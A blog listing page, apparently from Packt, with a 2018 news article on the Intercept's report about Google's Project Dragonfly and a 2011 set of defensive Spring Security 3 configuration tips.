30 Nov 2018
5 min read
Google’s Project Dragonfly has faced significant criticism and scrutiny from both the public and Google employees. In a major report yesterday, the Intercept revealed how internal conversations around Google’s censored search engine for China shut out Google’s legal, privacy, and security teams. According to named and anonymous senior Googlers who worked on the project and spoke to The Intercept's Ryan Gallagher, Company executives appeared intent on watering down the privacy review. Google bosses also worked to suppress employee criticism of the censored search engine. Project Dragonfly is the secretive search engine that Google is allegedly developing which will comply with the Chinese rules of censorship. It was kept secret from the company at large during the 18 months it was in development until an insider leak led to its existence being revealed in The Intercept. It has been on the receiving end of a constant backlash from various human rights organizations and investigative reporters, since then. Earlier this week, it also faced criticism from human rights organization Amnesty International and was followed by Google employees signing a petition protesting Google’s infamous Project Dragonfly. The secretive way Google operated Dragonfly Majority of the leaks were reported by Yonatan Zunger, a security engineer on the Dragonfly team. He was asked to produce the privacy review for the project in early 2017. However, he faced opposition from Scott Beaumont, Google’s top executive for China and Korea. According to Zunger, Beaumont “wanted the privacy review of Dragonfly]to be pro forma and thought it should defer entirely to his views of what the product ought to be. He did not feel that the security, privacy, and legal teams should be able to question his product decisions, and maintained an openly adversarial relationship with them — quite outside the Google norm.” Beaumont also micromanaged the project and ensured that discussions about Dragonfly and access to documents about it were under his tight control. If some members of the Dragonfly team broke the strict confidentiality rules, then their contracts at Google could be terminated. Privacy report by Zunger In midst of all these conditions, Zunger and his team were still able to produce a privacy report. The report mentioned problematic scenarios that could arise if the search engine was launched in China. The report mentioned that, in China, it would be difficult for Google to legally push back against government requests, refuse to build systems specifically for surveillance, or even notify people of how their data may be used. Zunger’s meetings with the company’s senior leadership on the discussion of the privacy report were repeatedly postponed. Zunger said, “When the meeting did finally take place, in late June 2017, I and my team were not notified, so we missed it and did not attend. This was a deliberate attempt to exclude us.” Dragonfly: Not just an experiment Intercept’s report even demolished Sundar Pichai’s recent public statement on Dragonfly, where he described it as “just an experiment,” adding that it remained unclear whether the company “would or could” eventually launch it in China. Google employees were surprised as they were told to prepare the search engine for launch between January and April 2019, or sooner. “What Pichai said [about Dragonfly being an experiment] was ultimately horse shit,” said one Google source with knowledge of the project. “This was run with 100 percent intention of launch from day one. He was just trying to walk back a delicate political situation.” It is also alleged that Beaumont had intended from day one that the project should only be known about once it had been launched. “He wanted to make sure there would be no opportunity for any internal or external resistance to Dragonfly.” said one Google source to Intercept. This makes us wonder the extent to which Google really is concerned about upholding its founding values, and how far it will go in advocating internet freedom, openness, and democracy. It now looks a lot like a company who simply prioritizes growth and expansion into new markets, even if it means compromising on issues like internet censorship and surveillance. Perhaps we shouldn’t be surprised. Google CEO Sundar Pichai is expected to testify in Congress on Dec. 5 to discuss transparency and bias. Members of Congress will likely also ask about Google's plans in China. Public opinion on Intercept’s report is largely supportive. https://twitter.com/DennGordon/status/1068228199149125634 https://twitter.com/mpjme/status/1068268991238541312 https://twitter.com/cynthiamw/status/1068240969990983680 Google employee and inclusion activist Liz Fong Jones tweeted that she would match $100,000 in pledged donations to a fund to support employees who refuse to work in protest. https://twitter.com/lizthegrey/status/1068212346236096513 She has also shown full support for Zunger https://twitter.com/lizthegrey/status/1068209548320747521 Google employees join hands with Amnesty International urging Google to drop Project Dragonfly OK Google, why are you ok with mut(at)ing your ethos for Project DragonFly? Amnesty International takes on Google over Chinese censored search engine, Project Dragonfly.
Read more
  • 0
  • 0
  • 2804

article-image-spring-security-3-tips-and-tricks
Packt
28 Feb 2011
6 min read
Save for later

Spring Security 3: Tips and Tricks

Packt
28 Feb 2011
6 min read
  Spring Security 3 Make your web applications impenetrable. Implement authentication and authorization of users. Integrate Spring Security 3 with common external security providers. Packed full with concrete, simple, and concise examples. It's a good idea to change the default value of the spring_security_login page URL. Tip: Not only would the resulting URL be more user- or search-engine friendly, it'll disguise the fact that you're using Spring Security as your security implementation. Obscuring Spring Security in this way could make it harder for malicious hackers to find holes in your site in the unlikely event that a security hole is discovered in Spring Security. Although security through obscurity does not reduce your application's vulnerability, it does make it harder for standardized hacking tools to determine what types of vulnerabilities you may be susceptible to.   Evaluating authorization rules Tip: For any given URL request, Spring Security evaluates authorization rules in top to bottom order. The first rule matching the URL pattern will be applied. Typically, this means that your authorization rules will be ordered starting from most-specific to least-specific order. It's important to remember this when developing complicated rule sets, as developers can often get confused over which authorization rule takes effect. Just remember the top to bottom order, and you can easily find the correct rule in any scenario!   Using the JSTL URL tag to handle relative URLs Tip: : Use the JSTL core library's url tag to ensure that URLs you provide in your JSP pages resolve correctly in the context of your deployed web application. The url tag will resolve URLs provided as relative URLs (starting with a /) to the root of the web application. You may have seen other techniques to do this using JSP expression code (<%=request.getContextPath() %>), but the JSTL url tag allows you to avoid inline code!   Modifying username or password and the remember me Feature Tip: You have anticipated that if the user changes their username or password, any remember me tokens set will no longer be valid. Make sure that you provide appropriate messaging to users if you allow them to change these bits of their account.   Configuration of remember me session cookies Tip: If token-validity-seconds is set to -1, the login cookie will be set to a session cookie, which does not persist after the user closes their browser. The token will be valid (assuming the user doesn't close their browser) for a non-configurable length of 2 weeks. Don't confuse this with the cookie that stores your user's session ID—they're two different things with similar names!   Checking Full Authentication without Expressions Tip: If your application does not use SpEL expressions for access declarations, you can still check if the user is fully authenticated by using the IS_ AUTHENTICATED_FULLY access rule (For example, .access="IS_AUTHENTICATED_FULLY"). Be aware, however, that standard role access declarations aren't as expressive as SpEL ones, so you will have trouble handling complex boolean expressions.   Debugging remember me cookies Tip: There are two difficulties when attempting to debug issues with remember me cookies. The first is getting the cookie value at all! Spring Security doesn't offer any log level that will log the cookie value that was set. We'd suggest a browser-based tool such as Chris Pederick's Web Developer plug-in (http://chrispederick.com/work/web-developer/) for Mozilla Firefox. Browser-based development tools typically allow selective examination (and even editing) of cookie values. The second (admittedly minor) difficulty is decoding the cookie value. You can feed the cookie value into an online or offline Base64 decoder (remember to add a trailing = sign to make it a valid Base64-encoded string!)   Making effective use of an in-memory UserDetailsService Tip: A very common scenario for the use of an in-memory UserDetailsService and hard-coded user lists is the authoring of unit tests for secured components. Unit test authors often code or configure the minimal context to test the functionality of the component under test. Using an in-memory UserDetailsService with a well-defined set of users and GrantedAuthority values provides the test author with an easily controlled test environment.   Storing sensitive information Tip: Many guidelines that apply to storage of passwords apply equally to other types of sensitive information, including social security numbers and credit card information (although, depending on the application, some of these may require the ability to decrypt). It's quite common for databases storing this type of information to represent it in multiple ways, for example, a customer's full 16-digit credit card number would be stored in a highly encrypted form, but the last four digits might be stored in cleartext (for reference, think of any internet commerce site that displays XXXX XXXX XXXX 1234 to help you identify your stored credit cards).   Annotations at the class level Tip: Be aware that the method-level security annotations can also be applied at the class level as well! Method-level annotations, if supplied, will always override annotations specified at the class level. This can be helpful if your business needs dictate specification of security policies for an entire class at a time. Take care to use this functionality in conjunction with good comments and coding standards, so that developers are very clear about the security characteristics of a class and its methods.   Authenticating the user against LDAP Tip: Do not make the very common mistake of configuring an <authentication-provider> with a user-details-service-ref referring to an LdapUserDetailsService, if you are intending to authenticate the user against LDAP itself!   Externalize URLs and environment-dependent settings Tip: Coding URLs into Spring configuration files is a bad idea. Typically, storage and consistent reference to URLs is pulled out into a separate properties file, with placeholders consistent with the Spring PropertyPlaceholderConfigurer. This allows for reconfiguration of environment-specific settings via externalizable properties files without touching the Spring configuration files, and is generally considered good practice. Summary In this article we took a look at some of the tips and tricks for Spring Security. Further resources on this subject: Spring Security 3 [Book] Migration to Spring Security 3 [Article] Opening up to OpenID with Spring Security [Article] Spring Security: Configuring Secure Passwords [Article]
Read more
  • 0
  • 0
  • 2754